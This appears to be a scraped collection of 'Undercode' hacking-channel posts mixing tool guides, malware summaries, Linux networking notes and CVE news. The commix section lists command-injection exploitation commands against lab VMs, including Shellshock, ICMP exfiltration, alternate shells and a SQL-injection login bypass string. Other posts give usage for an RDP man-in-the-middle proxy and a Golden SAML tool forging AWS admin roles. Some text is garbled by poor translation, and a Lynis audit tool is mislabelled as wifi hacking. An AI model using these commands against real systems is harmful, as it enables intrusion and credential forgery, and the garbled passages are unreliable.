▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Network configuration-the arrival of home network by undercode:
> Today, the number of home PCs has inevitably exceeded one. Usually, when we upgrade us After the machine, or after giving the child one, or the wife bringing back one to work, we have more than one computer at home. Anyway, in the end we will have a bunch of machines.

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

The following is a list of the functions that the network solution has, including Common home operating systems and two uncommon network solutions-Linux and Microsoft NT:

Linux Unix NT Win95 Mac OS / 2
Printer services xxxxxx
File server / sharing x * * * * *
Mail server x * * *--
Domain Name Server xx * * * *
Web Server xx * * * *
Firewall x * * *--
Routing xxx---
Gateway xxx---
Internet xxxxxx
Ethernet xxxxxx
Token Ring x * * * * *
Arcnet x * * * * *
Framerelay x * *---
ISDN x * * *--
PPP xxxxxx
SLIP xxxxxx
TCP / IP xxxxxx
X.25 x * * * * *
IPX (Novell Netware) xxxx * *
SMB (Windows network) xxxx * *
Appletalk x * * * x *
NFS xx * * * *

------------ -------------------------------------------------- ------------------

x Supported by the system itself
* Need additional support
-not supported
After comparison of chart functions, some systems have been disregarded. If you are not using this It ’s a pity, but it ’s best to discuss with the OEM, since even they all recommend you to replace it. In addition, all kinds of UNIX are included in a UNIX column, except Linux.

written by Undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 TOP ACTIVE MALWARES IN 2020 :
T.me/UndercodeTesting



1) Emotet is a modular infostealer that downloads or drops banking trojans. It can be delivered through either malicious download links or attachments, such as PDF or macro-enabled Word documents. Emotet also incorporates spreader modules in order to propagate throughout a network. In December 2018, Emotet was observed using a new module that exfiltrates email content.

2) WannaCry is a ransomware cryptoworm using the EternalBlue exploit to spread via SMB protocol. Version 1.0 has a “killswitch” domain, which stops the encryption process.

3) Kovter is a fileless click fraud malware and a downloader that evades detection by hiding in registry keys. Reporting indicates that Kovter can have backdoor capabilities and uses hooks within certain APIs for persistence.

4) ZeuS is a modular banking trojan which uses keystroke logging to compromise victim credentials when the user visits a banking website. Since the release of the ZeuS source code in 2011, many other malware variants adopted parts of it’s codebase, which means that events classified as ZeuS may actually be other malware using parts of the ZeuS code.

5) Dridex is a malware banking variant that uses malicious macros in Microsoft Office with either malicious embedded links or attachments. Dridex is disseminated via malspam campaigns

6) IcedID is a modular banking Trojan targeting banks, payment card providers, and payroll websites. IcedID utilizes the same distribution infrastructure as Emotet. The malware can monitor a victim’s online activity by setting up local proxies for traffic tunneling, employing web injection and redirection attacks. It propagates across a network by infecting terminal servers

7) Gh0st is a RAT used to control infected endpoints. Gh0st is dropped by other malware to create a backdoor into a device that allows an attacker to fully control the infected device

8) Mirai is a malware botnet known to compromise Internet of Things (IoT) devices in order to conduct large-scale DDoS attacks. Mirai is dropped after an exploit has allowed the attacker to gain access to a machine.

9) NanoCore is a RAT spread via malspam as a malicious Excel XLS spreadsheet. As a RAT, NanoCore can accept commands to download and execute files, visit websites, and add registry keys for persistence.

10) Pushdo is a botnet that has been active since 2007 and operates as a service for malware and spam distribution. Pushdo is known to distribute the Cutwail spambot. The malware uses encrypted communication channels and domain generation algorithms to send instructions to its zombie hosts.

written by Undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2020 updated wifi hacking- Lynis - Security auditing tool for Linux, macOS, and UNIX-based systems. Assists with compliance testing (HIPAA/ISO27001/PCI DSS) and system hardening. Agentless, and installation optional

🦑FEATURES :

Automated security auditing
Compliance testing (e.g. ISO27001, PCI-DSS, HIPAA)
Vulnerability detection

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ :

1) git clone https://github.com/CISOfy/lynis
Execute:

2) cd lynis; ./lynis audit system

3) If you want to run the software as root, we suggest changing the ownership of the files. Use chown -R 0:0 to recursively alter the owner and group and set it to user ID 0 (root).

🦑MORE :

Parameter Abbreviated Description
--auditor "Name" Assign an auditor name to the audit (report)
--checkall -c Start the check
--check-update Check if Lynis is up-to-date
--cronjob Run Lynis as cronjob (includes -c -Q)
--help -h Shows valid parameters
--manpage View man page
--nocolors Do not use any colors
--pentest Perform a penetration test scan (non-privileged)
--quick -Q Don't wait for user input, except on errors
--quiet Only show warnings (includes --quick, but doesn't wait)
--reverse-colors Use a different color scheme for light backgrounds
--version -V Check program version (and quit)

@UndercodeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2020 rdp Remote Desktop Protocol :
RDPY is a pure Python implementation of the Microsoft RDP (Remote Desktop Protocol) protocol (client and server side). RDPY is built over the event driven network engine Twisted. RDPY support standard RDP security layer, RDP over SSL and NLA authentication (through ntlmv2 authentication protocol).
twitter.com/undercodeNews

🦑 FEATURES :

RDP Man In The Middle proxy which record session
RDP Honeypot
RDP screenshoter
RDP client
VNC client
VNC screenshoter
RSS Player

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ :

$ git clone https://github.com/citronneur/rdpy.git rdpy

$ pip install twisted pyopenssl qt4reactor service_identity rsa pyasn1

$ python rdpy/setup.py install
Or use PIP:

$ pip install rdpy
For virtualenv, you will need to link the qt4 library to it:

$ ln -s /usr/lib/python2.7/dist-packages/PyQt4/ $VIRTUAL_ENV/lib/python2.7/site-packages/
$ ln -s /usr/lib/python2.7/dist-packages/sip.so $VIRTUAL_ENV/lib/python2.7/site-packages/

🦑COMMANDS :

rdpy-rdpclient
rdpy-rdpclient is a simple RDP Qt4 client.

$ rdpy-rdpclient.py [-u username] [-p password] [-d domain] [-r rss_ouput_file] [...] XXX.XXX.XXX.XXX[:3389]
You can use rdpy-rdpclient in a Recorder Session Scenario, used in rdpy-rdphoneypot.

rdpy-vncclient
rdpy-vncclient is a simple VNC Qt4 client .

$ rdpy-vncclient.py [-p password] XXX.XXX.XXX.XXX[:5900]
rdpy-rdpscreenshot
rdpy-rdpscreenshot saves login screen in file.

$ rdpy-rdpscreenshot.py [-w width] [-l height] [-o output_file_path] XXX.XXX.XXX.XXX[:3389]
rdpy-vncscreenshot
rdpy-vncscreenshot saves the first screen update in file.

$ rdpy-vncscreenshot.py [-p password] [-o output_file_path] XXX.XXX.XXX.XXX[:5900]
rdpy-rdpmitm
rdpy-rdpmitm is a RDP proxy allows you to do a Man In The Middle attack on RDP protocol. Record Session Scenario into rss file which can be replayed by rdpy-rssplayer.

$ rdpy-rdpmitm.py -o output_dir [-l listen_port] [-k private_key_file_path] [-c certificate_file_path] [-r (for XP or server 2003 client)] target_host[:target_port]
Output directory is used to save the rss file with following format (YYYYMMDDHHMMSS_ip_index.rss) The private key file and the certificate file are classic cryptographic files for SSL connections. The RDP protocol can negotiate its own security layer If one of both parameters are omitted, the server use standard RDP as security layer.

rdpy-rdphoneypot
rdpy-rdphoneypot is an RDP honey Pot. Use Recorded Session Scenario to replay scenario through RDP Protocol.

$ rdpy-rdphoneypot.py [-l listen_port] [-k private_key_file_path] [-c certificate_file_path] rss_file_path_1 ... rss_file_pa

🦑 TESTED BY UNDERCODE

@UndercodeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2020 UPDATED Automated All-in-One OS command injection and exploitation tool.
fb.com/undercodeTesting

🦑SUPPORTED OS :

ArchStrike
BlackArch Linux
BackBox
Kali Linux
Parrot Security OS
Pentoo Linux
Weakerthan Linux
Mac OS X
Windows (experimental)

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ :

1) git clone https://github.com/commixproject/commix.git

2) cd commix

3) python commix.py -h

🦑COMMANDS :

1. Exploiting Damn Vulnerable Web App:
root@kali:~/commix# python commix.py --url="http://192.168.178.58/DVWA-1.0.8/vulnerabilities/exec/#" --data="ip=127.0.0.1&Submit=submit" --cookie="security=medium; PHPSESSID=nq30op434117mo7o2oe5bl7is4"

2. Exploiting php-Charts 1.0 using injection payload suffix & prefix string:
root@kali:~/commix# python commix.py --url="http://192.168.178.55/php-charts_v1.0/wizard/index.php?type=test" --prefix="'" --suffix="//"

3. Exploiting OWASP Mutillidae using extra headers and HTTP proxy:
root@kali:~/commix# python commix.py --url="http://192.168.178.46/mutillidae/index.php?popUpNotificationCode=SL5&page=dns-lookup.php" --data="target_host=127.0.0.1" --headers="Accept-Language:fr\nETag:123\n" --proxy="127.0.0.1:8081"

4. Exploiting Persistence using ICMP exfiltration technique:
root@kali:~/commix# python commix.py --url="http://192.168.178.8/debug.php" --data="addr=127.0.0.1" --icmp-exfil="ip_src=192.168.178.5,ip_dst=192.168.178.8"

5. Exploiting Persistence using an alternative (python) shell:
root@kali:~/commix# python commix.py --url="http://192.168.178.8/debug.php" --data="addr=127.0.0.1" --alter-shell="Python"

6. Exploiting Kioptrix: Level 1.1 (#2):
root@kali:~/commix# python commix.py --url="http://192.168.178.2/pingit.php" --data="ip=127.0.0.1E&submit=submit" --auth-url="http://192.168.178.2/index.php" --auth-data="uname=admin&psw=%27+OR+1%3D1--+-&btnLogin=Login"

7. Exploiting Kioptrix: 2014 (#5) using custom user-agent and specified injection technique:
root@kali:~/commix# python commix.py --url="http://192.168.178.6:8080/phptax/drawimage.php?pfilez=127.0.0.1&pdf=make" --user-agent="Mozilla/4.0 Mozilla4_browser" --technique="f" --root-dir="/"

8. Exploiting CVE-2014-6271/Shellshock:
root@kali:~/commix# python commix.py --url="http://192.168.178.4/cgi-bin/status/" --shellshock

9. Exploiting commix-testbed (cookie) using cookie-based injection:
root@kali:~/commix# python commix.py --url="http://192.168.2.8/commix-testbed/scenarios/cookie/cookie(blind).php" --cookie="addr=127.0.0.1"

10. Exploiting commix-testbed (user-agent) using ua-based injection:
root@kali:~/commix# python commix.py --url="http://192.168.2.4/commix-testbed/scenarios/user-agent/ua(blind).php" --level=3

11. Exploiting commix-testbed (referer) using referer-based injection:
root@kali:~/commix# python commix.py --url="http://192.168.2.4/commix-testbed/scenarios/referer/referer(classic).php" --level=3

12. Exploiting Flick 2 using custom headers and base64 encoding option:
root@kali:~/commix# python commix.py --url="https://192.168.2.12/do/cmd/*" --headers="X-UUID:commix\nX-Token:dTGzPdMJlOoR3CqZJy7oX9JU72pvwNEF" --base64

13. Exploiting commix-testbed (JSON-based) using JSON POST data:
root@kali:~/commix# python commix.py --url="http://192.168.2.11/commix-testbed/scenarios/regular/POST/classic_json.php" --data='{"addr":"127.0.0.1","name":"ancst"}'

14. Exploiting SickOs 1.1 using shellshock module and HTTP proxy:
root@kali:~/commix# python commix.py --url="http://192.168.2.8/cgi-bin/status" --shellshock --proxy="192.168.2.8:3128"

🦑 Tested by undercode on ubuntu

@UndercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 2020 updated automated dynamic malware analysis system
pinterest.com/undercode_Testing

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ :

1) $ sudo pip install -U pip setuptools

2) $ sudo pip install -U cuckoo
Although the above, a global installation of Cuckoo in your OS works mostly fine, we highly recommend installing Cuckoo in a virtualenv, which looks roughly as follows:

3) $ virtualenv venv

4) $ . venv/bin/activate

> (venv)$ pip install -U pip setuptools

> (venv)$ pip install -U cuckoo

5) for cloning > git clone https://github.com/cuckoosandbox/cuckoo.git

enjoy free malware analysis

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

# Support & share :

t.me/UndercodeTesting

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑A tool that implements the Golden SAML attack
instagram.com/undercodeTesting

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ :

1) python -m pip install boto3 botocore defusedxml enum python_dateutil lxml signxml

2) git clone https://github.com/cyberark/shimit.git

3) cd shimit

4) python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file
-u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012
idp - Identity Provider URL e.g. http://server.domain.com/adfs/services/trust

pk - Private key file full path (pem format)

c - Certificate file full path (pem format)

u - User and domain name e.g. domain\username (use \ or quotes in *nix)

n - Session name in AWS

r - Desired roles in AWS. Supports Multiple roles, the first one specified will be assumed.

id - AWS account id e.g. 123456789012

Save SAMLResponse to file
python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file
-u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012 -o saml_response.xml
o - Output encoded SAMLResponse to a specified file path

Load SAMLResponse from file
python .\shimit.py -l saml_response.xml
l - Load SAMLResponse from a specified file path

@undercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑after all those great tools let s send some programming tip by undercode

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Speed Optimization-Tuning Tools for Tuning Linux Network by undercode :
PerformanceLINUX network performance tuning of debugging tools
T..me/undercodeTesting

🦑 𝕃𝔼𝕋 𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) route

must specify the path for the machine to receive the data packet. In the Linux system, a command route is provided. This command can set a static route for the network card configured by the ifconfig command. This kind of setting work is usually introduced in /etc/rc.d/rc.inet1 and is carried out when the system boots.

2) We use several examples to illustrate how to use the route command:

> route add -net 127.0.0.0

3) This command will add a route to a specified address or network to the routing table. Note that the network is now a class A address and the mask is set to 255.0.0.0, and this newly added entry is connected to the lo device.

> route add -net xxx.xxx.xxx.xxx netmask 255.255.255.0 dev eth0

4) This command adds a route to the host with the IP address xxx.xxx.xxx.xxx, and its netmask is set to 255.255.255.0.

> route del -net xxx.xxx.xxx.xxx

5) This command will delete the route of the network xxx.xxx.xxx.xxx.

Using the route command can also easily manage the routing information of the entire network, and the output is the network routing table. As follows:

-------------------------------------------------- ---------------
🦑 [root @ lee / root] #route
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
10.10.8.224 * 255.255.255.255 UH 0 0 0 eth0
10.10. 8.0 * 255.255.255.0 U 0 0 0 eth0
127.0.0.0 * 255.0.0.0 U 0 0 0 lo
default dgc8.njupt.edu 0.0.0.0 UG 0 0 0 eth0
default dgc8.njupt.edu 0.0.0.0 UG 1 0 0 eth0
[root @ lee / root] #
------------------------------------------ -----------------------


6) The meaning of each field in the output is:

· Destination indicates the destination IP address of the route.

· Gateway indicates the host name or IP address used by the gateway. The "*" output above indicates that there is no gateway.

· Genmask indicates the network mask of the route. Before comparing it with the destination address of the route, the kernel performs a bitwise AND operation with the Genmask and the IP address of the packet to set the route.

· Flags are flags that indicate routing. The available signs and their meanings are: U means that the route is starting, H means that the target is a host, G means to use the gateway, R means to reset the dynamic route; D means to dynamically install the route, and M means to modify the route! Reject routing.

· Metric indicates the unit cost of routing.

· Ref indicates the number of other routes that depend on the current status of the route.

· Use indicates the number of routing table entries used.

· Iface indicates the destination network for routing the sent packets.

🦑 By viewing these output information, we can easily manage the routing table of the network.

6) netstat The

netstat command is a very useful tool for monitoring TCP / IP networks. It can display routing tables, actual network connections, and status information for each network interface device. After executing netstat on the computer, the output is as follows:

------------------------------------ -----------------------------
[root @ lee / root] #netstat
Active Internet connections (w / o servers)
Proto Recv- Q Send-Q Local Address Foreign Address State
Active UNIX domain sockets (w / o servers)
Proto RefCnt Flags Types State I-Node Path
Unix 5 [] DGRAM 460 / dev / log
Unix 0 [] STREAM CONNECTED 173 @ 00000014
Unix 0 [] DGRAM 662
Unix 0 [] DGRAM 631
Unix 0 [] DGRAM 544
Unix 0 [] DGRAM 484
Unix 0 [] DGRAM 470
[root @ lee / root] #
--- -------------------------------------------------- ------------

7) Overall, the output of netstat can be divided into two parts: The first part is Active Internet connections, called active TCP connections. In the output above, There is no content in this part, which means that there is no TCP connection yet. The second part: Active UNIX domain sockets, called active Unix domain sockets. The output shows the connection status of the Unix domain socket:

🦑 Proto displays the protocol used for the connection.

· RefCnt represents the process number connected to this socket.

· Types shows the type of socket.

· State displays the current state of the socket.

· Path represents the path name used by other processes connected to the socket.

8) You can use netstat -a to view the status of all sockets, which is very useful when you debug network programs. netstat -r will display the contents of the routing table, generally also specify the "-n" option at the same time, so that you can get the address in digital format, you can also display the IP address of the default router. Use netstat -i will display all network interface information. Using netstat can also get the current network status and network topology, which is very useful in practice.

9) tcpdump The

tcpdump command is used to monitor TCP / IP connections and directly read the packet header of the data link layer. You can specify which data packets are monitored and which controls are displayed in a format. For example, if we want to monitor all the communication on the Ethernet, execute the following command:

　　tcpdump -i eth0



10) Even on a relatively calm network, there are a lot of communication, so we may only need to get the information of those packets we are interested in . In general, the TCP / IP stack only binds incoming packets received by the local host while ignoring other computer addresses on the network (unless you are using a router). When running the tcpdump command, it will set the TCP / IP stack to promiscuous mode. This mode can receive all data packets and make them display effectively. If we are only concerned about communication cases, one method is to use our local hosts "-p" parameter prohibit promiscuous mode, there is a way to specify the hostname:

　> 　tcpdump -i eth0 Host hostname



10) At this point, the system will only be named The communication packets of hostname host are monitored. The host name can be the local host or any computer on the network. The following command can read all data sent by host hostname:

> tcpdump -i eth0 src host hostname


🦑 The following command can monitor all data packets sent to host hostname:

> tcpdump -i eth0 dst host hostname

11) We can also monitor packets passing through the specified gateway:

tcpdump -i eth0 gateway Gatewayname

12) If you also want to monitor TCP or UDP packets addressed to the specified port, then execute the following command:

tcpdump -i eth0 host hostname and port 80

13) This command will display the header from each packet and the addressing of port 80 from the hostname of the host. Port 80 is the system default HTTP service port number. If we only need to list the packets sent to port 80, use dst port; if we only want to see the packets returned to port 80, use src port.

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Full trick Speed Optimization-Tuning Tools for Tuning Linux Network by undercode :
PerformanceLINUX network performance tuning of debugging tools
E N J O Y

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Hacker News by Undercode :
recently from undercode Tweets :

!!!!!!! OpenSSL exposes a high-risk vulnerability


> The OpenSSL project released a security bulletin that disclosed a high-risk vulnerability affecting OpenSSL v1.1.1d, 1.1.1e, and 1.1.1f.

> The vulnerability can be used to launch denial of service attacks.

> The developer claims that server or client applications that call the SSL_check_chain () function during or after the TLS 1.3 handshake may crash due to incorrect handling of null pointer references caused by the signature_algorithms_cert extension.

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Hacker News by Undercode - google bugs last
recently from twitter.com/undercodeNews :

Google releases Chrome emergency patch to fix CVE-2020-6457 critical vulnerability :

> Google has released an emergency fix for the Chrome browser and urges users to install it as soon as possible. Google did not disclose more information about the CVE-2020-6457 vulnerability, but only confirmed it as a "use after free" type vulnerability.

> The vulnerability was discovered by Sophos security researchers and is said to be a remote code execution (RCE) vulnerability. The vulnerability allows an attacker to run commands and untrusted scripts without the victim ’s knowledge.

> Security researcher Paul Ducklin said in a blog post that the vulnerability will allow hackers to “change the control flow inside your program, including transferring the CPU to run untrusted code that the attacker just poke into memory from outside, thus bypassing any browser The usual security check or 'Are you sure' dialog. "

> In addition, he also said that the vulnerability has a wide range of impacts, including up to 2 billion users of Windows, macOS and GNU / Linux users may be affected. So after most users have installed the update, Google may announce more details.

> If you are a Google Chrome browser user, then you should make sure you are running v81.0.4044.113 or above. You can check the updated and installed version by visiting the help about Google Chrome browser.

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 After this new google Cve 100 reasons to use firefox for access google.com :(

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 USA NUMBERS Making Free Phone Calls :

1) >https://play.google.com/store/apps/details?id=com.talkatone.android

> https://itunes.apple.com/us/app/talkatone-wifi-text-calls/id397648381?mt=8

2) >https://play.google.com/store/apps/details?id=com.enflick.android.TextNow

> https://itunes.apple.com/us/app/textnow-call-text-unlimited/id314716233?mt=8

3) https://play.google.com/store/apps/details?id=com.textmeinc.freetone

> https://itunes.apple.com/us/app/free-tone-calling-texting/id338088432?mt=8

4) https://play.google.com/store/apps/details?id=com.textmeinc.textme

> https://itunes.apple.com/us/app/text-me-phone-calls-text/id514485964?mt=8

5) https://play.google.com/store/apps/details?id=com.gogii.textplus

> https://itunes.apple.com/us/app/textplus-unlimited-text-calls/id314487667?mt=8

6) https://play.google.com/store/apps/details?id=me.dingtone.app.im

> https://itunes.apple.com/us/app/dingtone-wifi-calling-text/id588937297?mt=8

E N J O Y

written by undercoder
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁